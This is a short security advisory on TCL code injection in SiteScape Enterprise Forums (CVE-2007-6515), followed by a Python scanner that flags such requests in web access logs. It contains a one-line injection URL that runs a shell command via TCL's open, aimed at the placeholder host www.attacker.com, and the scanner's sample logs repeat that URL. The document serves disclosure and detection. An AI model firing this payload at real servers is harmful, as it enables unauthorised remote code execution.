Discovered: 12-07-10
By: Spencer McIntyre (zeroSteiner)
SecureState R&D Team
www.securestate.com

Background:
-----------
TCL Code injection has previously been discovered

New Details:
------------
Confirmation that SiteScape servers are vulnerable to TCL injection
allowing remote code execution through TCL payloads. SecureState has
released proof of concept exploit code for this vulnerability.

Vulnerable Versions:
--------------------
Tested on SiteScape Enterprise Forums version 7, others may be vulnerable.

TCL Code Injection:
-------------------
++ Replace "ping www.attacker.com" with something useful
http://www.website.com/dispatch.cgi/0;set fl [open "|ping www.attacker.com" ]

References:
-----------
BID         http://www.securityfocus.com/bid/26963
CVE         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6515
Post        http://securityvulns.com/Sdocument702.html
PoC         http://www.securestate.com/Documents/sitescape_sploit.txt
Whitepaper  http://www.securestate.com/Downloadables/Documents/whitepapers-profiling-penetration/SiteScape_TCL_Code_Injection.pdf
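
A defender-side check for the request pattern shown under "TCL Code Injection", as an added example that is not part of the original advisory or of SecureState's PoC: it scans web access-log lines for TCL metacharacters in the path info that follows dispatch.cgi. The common/combined log format, the sample log lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Characters with syntactic meaning to a TCL interpreter: command separator,
# command/variable substitution, grouping, quoting, pipe, escape, newline.
TCL_META = set(';[]${}"|\\\r\n')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(log_line):
    """Return the sorted TCL metacharacters found after dispatch.cgi, or []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    path = match.group(1).split("?", 1)[0]  # ignore the query string
    marker = path.lower().find("dispatch.cgi")
    if marker == -1:
        return []
    path_info = decode_fully(path[marker + len("dispatch.cgi"):])
    return sorted(TCL_META.intersection(path_info))

def scan(lines):
    """Yield (line_number, metacharacters) for every flagged entry."""
    for number, line in enumerate(lines, start=1):
        found = suspicious_path_info(line)
        if found:
            yield number, found

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Dec/2010:10:00:01 +0000] "GET /dispatch.cgi/f.general HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Dec/2010:10:00:09 +0000] "GET /dispatch.cgi/0;set%20fl%20[open%20%22|ping%20www.attacker.com%22%20] HTTP/1.1" 200 312',
    '192.0.2.44 - - [07/Dec/2010:10:00:15 +0000] "GET /dispatch.cgi/0%253Bset%2520x HTTP/1.1" 200 312',
    '192.0.2.10 - - [07/Dec/2010:10:00:20 +0000] "GET /index.html?a=1;b=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: TCL metacharacters in path info: {found}")
```

The check treats any TCL metacharacter in the path info as suspicious, which assumes legitimate forum URLs never carry them there; tune the character set against known-good traffic before alerting on it.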